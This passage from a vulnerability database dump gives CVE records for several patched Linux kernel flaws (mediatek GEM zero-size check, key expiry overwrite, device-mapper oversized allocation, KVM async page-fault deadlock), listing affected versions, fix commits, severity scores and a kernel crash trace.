"x_transferred"
],
"url": "https://git.kernel.org/stable/c/13562c2d48c9ee330de1077d00146742be368f05"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/af26ea99019caee1500bf7e60c861136c0bf8594"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9489951e3ae505534c4013db4e76b1b5a3151ac7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fb4aabdb1b48c25d9e1ee28f89440fd2ce556405"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1e4350095e8ab2577ee05f8c3b044e661b5af9a0"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-38549",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T17:14:57.159226Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:57.567Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/mediatek/mtk_drm_gem.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "79078880795478d551a05acc41f957700030d364",
"status": "affected",
"version": "119f5173628aa7a0c3cf9db83460d40709e8241d",
"versionType": "git"
},
{
"lessThan": "be34a1b351ea7faeb15dde8c44fe89de3980ae67",
"status": "affected",
"version": "119f5173628aa7a0c3cf9db83460d40709e8241d",
"versionType": "git"
},
{
"lessThan": "d17b75ee9c2e44d3a3682c4ea5ab713ea6073350",
"status": "affected",
"version": "119f5173628aa7a0c3cf9db83460d40709e8241d",
"versionType": "git"
},
{
"lessThan": "0e3b6f9123726858cac299e1654e3d20424cabe4",
"status": "affected",
"version": "119f5173628aa7a0c3cf9db83460d40709e8241d",
"versionType": "git"
},
{
"lessThan": "13562c2d48c9ee330de1077d00146742be368f05",
"status": "affected",
"version": "119f5173628aa7a0c3cf9db83460d40709e8241d",
"versionType": "git"
},
{
"lessThan": "af26ea99019caee1500bf7e60c861136c0bf8594",
"status": "affected",
"version": "119f5173628aa7a0c3cf9db83460d40709e8241d",
"versionType": "git"
},
{
"lessThan": "9489951e3ae505534c4013db4e76b1b5a3151ac7",
"status": "affected",
"version": "119f5173628aa7a0c3cf9db83460d40709e8241d",
"versionType": "git"
},
{
"lessThan": "fb4aabdb1b48c25d9e1ee28f89440fd2ce556405",
"status": "affected",
"version": "119f5173628aa7a0c3cf9db83460d40709e8241d",
"versionType": "git"
},
{
"lessThan": "1e4350095e8ab2577ee05f8c3b044e661b5af9a0",
"status": "affected",
"version": "119f5173628aa7a0c3cf9db83460d40709e8241d",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/mediatek/mtk_drm_gem.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.7"
},
{
"lessThan": "4.7",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.316",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.278",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.219",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.161",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.93",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.33",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.316",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.278",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.219",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.161",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.93",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.33",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.12",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.3",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "4.7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/mediatek: Add 0 size check to mtk_drm_gem_obj\n\nAdd a check to mtk_drm_gem_init if we attempt to allocate a GEM object\nof 0 bytes. Currently, no such check exists and the kernel will panic if\na userspace application attempts to allocate a 0x0 GBM buffer.\n\nTested by attempting to allocate a 0x0 GBM buffer on an MT8188 and\nverifying that we now return EINVAL."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:13:46.917Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/79078880795478d551a05acc41f957700030d364"
},
{
"url": "https://git.kernel.org/stable/c/be34a1b351ea7faeb15dde8c44fe89de3980ae67"
},
{
"url": "https://git.kernel.org/stable/c/d17b75ee9c2e44d3a3682c4ea5ab713ea6073350"
},
{
"url": "https://git.kernel.org/stable/c/0e3b6f9123726858cac299e1654e3d20424cabe4"
},
{
"url": "https://git.kernel.org/stable/c/13562c2d48c9ee330de1077d00146742be368f05"
},
{
"url": "https://git.kernel.org/stable/c/af26ea99019caee1500bf7e60c861136c0bf8594"
},
{
"url": "https://git.kernel.org/stable/c/9489951e3ae505534c4013db4e76b1b5a3151ac7"
},
{
"url": "https://git.kernel.org/stable/c/fb4aabdb1b48c25d9e1ee28f89440fd2ce556405"
},
{
"url": "https://git.kernel.org/stable/c/1e4350095e8ab2577ee05f8c3b044e661b5af9a0"
}
],
"title": "drm/mediatek: Add 0 size check to mtk_drm_gem_obj",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-38549",
"datePublished": "2024-06-19T13:35:22.042Z",
"dateReserved": "2024-06-18T19:36:34.920Z",
"dateUpdated": "2025-11-04T17:21:22.970Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-36031 (GCVE-0-2024-36031)
Vulnerability from cvelistv5
Published
2024-05-30 15:23
Modified
2025-11-04 17:20
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
keys: Fix overwrite of key expiration on instantiation
The expiry time of a key is unconditionally overwritten during
instantiation, defaulting to turn it permanent. This causes a problem
for DNS resolution as the expiration set by user-space is overwritten to
TIME64_MAX, disabling further DNS updates. Fix this by restoring the
condition that key_set_expiry is only called when the pre-parser sets a
specific expiry.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 97be1e865e70e5a0ad0a5b5f5dca5031ca0b53ac Version: 2552b32b0b349df160a509fe49f5f308cb922f2b Version: 791d5409cdb974c31a1bc7a903ea729ddc7d83df Version: afc360e8a1256acb7579a6f5b6f2c30b85b39301 Version: 39299bdd2546688d92ed9db4948f6219ca1b9542 Version: 39299bdd2546688d92ed9db4948f6219ca1b9542 Version: 39299bdd2546688d92ed9db4948f6219ca1b9542 |
||
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "ad2011ea7879",
"status": "affected",
"version": "97be1e865e70",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "ed79b93f725c",
"status": "affected",
"version": "2552b32b0b34",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "e4519a016650",
"status": "affected",
"version": "791d5409cdb9",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "25777f3f4e1f",
"status": "affected",
"version": "afc360e8a125",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "939a08bcd433",
"status": "affected",
"version": "39299bdd2546",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "cc219cb8afbc",
"status": "affected",
"version": "39299bdd2546",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "9da27fb65a14",
"status": "affected",
"version": "39299bdd2546",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.31",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "6.7",
"status": "unaffected",
"version": "0",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:6.7:-:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "affected",
"version": "6.7"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "5.11",
"status": "unaffected",
"version": "5.10.217",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "5.16",
"status": "unaffected",
"version": "5.15.159",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "6.2",
"status": "unaffected",
"version": "6.1.91",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "6.9",
"status": "unaffected",
"version": "6.8.10",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "6.10",
"status": "unaffected",
"version": "6.9.1",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-36031",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-05T14:16:33.695503Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-324",
"description": "CWE-324 Use of a Key Past its Expiration Date",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-06-06T19:29:28.918Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-04T17:20:59.085Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ad2011ea787928b2accb5134f1e423b11fe80a8a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ed79b93f725cd0da39a265dc23d77add1527b9be"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e4519a016650e952ad9eb27937f8c447d5a4e06d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/25777f3f4e1f371d16a594925f31e37ce07b6ec7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/939a08bcd4334bad4b201e60bd0ae1f278d71d41"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cc219cb8afbc40ec100c0de941047bb29373126a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9da27fb65a14c18efd4473e2e82b76b53ba60252"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00019.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"security/keys/key.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "ad2011ea787928b2accb5134f1e423b11fe80a8a",
"status": "affected",
"version": "97be1e865e70e5a0ad0a5b5f5dca5031ca0b53ac",
"versionType": "git"
},
{
"lessThan": "ed79b93f725cd0da39a265dc23d77add1527b9be",
"status": "affected",
"version": "2552b32b0b349df160a509fe49f5f308cb922f2b",
"versionType": "git"
},
{
"lessThan": "e4519a016650e952ad9eb27937f8c447d5a4e06d",
"status": "affected",
"version": "791d5409cdb974c31a1bc7a903ea729ddc7d83df",
"versionType": "git"
},
{
"lessThan": "25777f3f4e1f371d16a594925f31e37ce07b6ec7",
"status": "affected",
"version": "afc360e8a1256acb7579a6f5b6f2c30b85b39301",
"versionType": "git"
},
{
"lessThan": "939a08bcd4334bad4b201e60bd0ae1f278d71d41",
"status": "affected",
"version": "39299bdd2546688d92ed9db4948f6219ca1b9542",
"versionType": "git"
},
{
"lessThan": "cc219cb8afbc40ec100c0de941047bb29373126a",
"status": "affected",
"version": "39299bdd2546688d92ed9db4948f6219ca1b9542",
"versionType": "git"
},
{
"lessThan": "9da27fb65a14c18efd4473e2e82b76b53ba60252",
"status": "affected",
"version": "39299bdd2546688d92ed9db4948f6219ca1b9542",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"security/keys/key.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.7"
},
{
"lessThan": "6.7",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.217",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.159",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.91",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.31",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.1",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.217",
"versionStartIncluding": "5.10.206",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.159",
"versionStartIncluding": "5.15.146",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.91",
"versionStartIncluding": "6.1.70",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.31",
"versionStartIncluding": "6.6.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.10",
"versionStartIncluding": "6.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.1",
"versionStartIncluding": "6.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "6.7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nkeys: Fix overwrite of key expiration on instantiation\n\nThe expiry time of a key is unconditionally overwritten during\ninstantiation, defaulting to turn it permanent. This causes a problem\nfor DNS resolution as the expiration set by user-space is overwritten to\nTIME64_MAX, disabling further DNS updates. Fix this by restoring the\ncondition that key_set_expiry is only called when the pre-parser sets a\nspecific expiry."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:10:56.104Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/ad2011ea787928b2accb5134f1e423b11fe80a8a"
},
{
"url": "https://git.kernel.org/stable/c/ed79b93f725cd0da39a265dc23d77add1527b9be"
},
{
"url": "https://git.kernel.org/stable/c/e4519a016650e952ad9eb27937f8c447d5a4e06d"
},
{
"url": "https://git.kernel.org/stable/c/25777f3f4e1f371d16a594925f31e37ce07b6ec7"
},
{
"url": "https://git.kernel.org/stable/c/939a08bcd4334bad4b201e60bd0ae1f278d71d41"
},
{
"url": "https://git.kernel.org/stable/c/cc219cb8afbc40ec100c0de941047bb29373126a"
},
{
"url": "https://git.kernel.org/stable/c/9da27fb65a14c18efd4473e2e82b76b53ba60252"
}
],
"title": "keys: Fix overwrite of key expiration on instantiation",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-36031",
"datePublished": "2024-05-30T15:23:46.831Z",
"dateReserved": "2024-05-17T13:50:33.160Z",
"dateUpdated": "2025-11-04T17:20:59.085Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2023-52429 (GCVE-0-2023-52429)
Vulnerability from cvelistv5
Published
2024-02-12 00:00
Modified
2025-11-04 18:21
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
dm_table_create in drivers/md/dm-table.c in the Linux kernel through 6.7.4 can attempt to (in alloc_targets) allocate more than INT_MAX bytes, and crash, because of a missing check for struct dm_ioctl.target_count.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2025-11-04T18:21:48.187Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://www.spinics.net/lists/dm-devel/msg56625.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=bd504bcfec41a503b32054da5472904b404341a4"
},
{
"name": "FEDORA-2024-88847bc77a",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GS7S3XLTLOUKBXV67LLFZWB3YVFJZHRK/"
},
{
"name": "FEDORA-2024-987089eca2",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3LZROQAX7Q7LEP4F7WQ3KUZKWCZGFFP2/"
},
{
"name": "[debian-lts-announce] 20240625 [SECURITY] [DLA 3842-1] linux-5.10 security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"name": "[debian-lts-announce] 20240627 [SECURITY] [DLA 3840-1] linux security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3LZROQAX7Q7LEP4F7WQ3KUZKWCZGFFP2/"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2023-52429",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-08-28T19:15:21.074403Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-789",
"description": "CWE-789 Memory Allocation with Excessive Size Value",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-03-25T15:54:01.376Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "dm_table_create in drivers/md/dm-table.c in the Linux kernel through 6.7.4 can attempt to (in alloc_targets) allocate more than INT_MAX bytes, and crash, because of a missing check for struct dm_ioctl.target_count."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-06-27T12:06:44.331Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://www.spinics.net/lists/dm-devel/msg56625.html"
},
{
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=bd504bcfec41a503b32054da5472904b404341a4"
},
{
"name": "FEDORA-2024-88847bc77a",
"tags": [
"vendor-advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GS7S3XLTLOUKBXV67LLFZWB3YVFJZHRK/"
},
{
"name": "FEDORA-2024-987089eca2",
"tags": [
"vendor-advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3LZROQAX7Q7LEP4F7WQ3KUZKWCZGFFP2/"
},
{
"name": "[debian-lts-announce] 20240625 [SECURITY] [DLA 3842-1] linux-5.10 security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"name": "[debian-lts-announce] 20240627 [SECURITY] [DLA 3840-1] linux security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2023-52429",
"datePublished": "2024-02-12T00:00:00.000Z",
"dateReserved": "2024-02-12T00:00:00.000Z",
"dateUpdated": "2025-11-04T18:21:48.187Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-26976 (GCVE-0-2024-26976)
Vulnerability from cvelistv5
Published
2024-05-01 05:20
Modified
2025-05-04 09:01
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
KVM: Always flush async #PF workqueue when vCPU is being destroyed
Always flush the per-vCPU async #PF workqueue when a vCPU is clearing its
completion queue, e.g. when a VM and all its vCPUs is being destroyed.
KVM must ensure that none of its workqueue callbacks is running when the
last reference to the KVM _module_ is put. Gifting a reference to the
associated VM prevents the workqueue callback from dereferencing freed
vCPU/VM memory, but does not prevent the KVM module from being unloaded
before the callback completes.
Drop the misguided VM refcount gifting, as calling kvm_put_kvm() from
async_pf_execute() if kvm_put_kvm() flushes the async #PF workqueue will
result in deadlock. async_pf_execute() can't return until kvm_put_kvm()
finishes, and kvm_put_kvm() can't return until async_pf_execute() finishes:
WARNING: CPU: 8 PID: 251 at virt/kvm/kvm_main.c:1435 kvm_put_kvm+0x2d/0x320 [kvm]
Modules linked in: vhost_net vhost vhost_iotlb tap kvm_intel kvm irqbypass
CPU: 8 PID: 251 Comm: kworker/8:1 Tainted: G W 6.6.0-rc1-e7af8d17224a-x86/gmem-vm #119
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015
Workqueue: events async_pf_execute [kvm]
RIP: 0010:kvm_put_kvm+0x2d/0x320 [kvm]
Call Trace:
<TASK>
async_pf_execute+0x198/0x260 [kvm]
process_one_work+0x145/0x2d0
worker_thread+0x27e/0x3a0
kthread+0xba/0xe0
ret_from_fork+0x2d/0x50
ret_from_fork_asm+0x11/0x20
</TASK>
---[ end trace 0000000000000000 ]---
INFO: task kworker/8:1:251 blocked for more than 120 seconds.
Tainted: G W 6.6.0-rc1-e7af8d17224a-x86/gmem-vm #119
"echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message.
task:kworker/8:1 state:D stack:0 pid:251 ppid:2 flags:0x00004000
Workqueue: events async_pf_execute [kvm]
Call Trace:
<TASK>
__schedule+0x33f/0xa40
schedule+0x53/0xc0
schedule_timeout+0x12a/0x140
__wait_for_common+0x8d/0x1d0
__flush_work.isra.0+0x19f/0x2c0
kvm_clear_async_pf_completion_queue+0x129/0x190 [kvm]
kvm_arch_destroy_vm+0x78/0x1b0 [kvm]
kvm_put_kvm+0x1c1/0x320 [kvm]
async_pf_execute+0x198/0x260 [kvm]
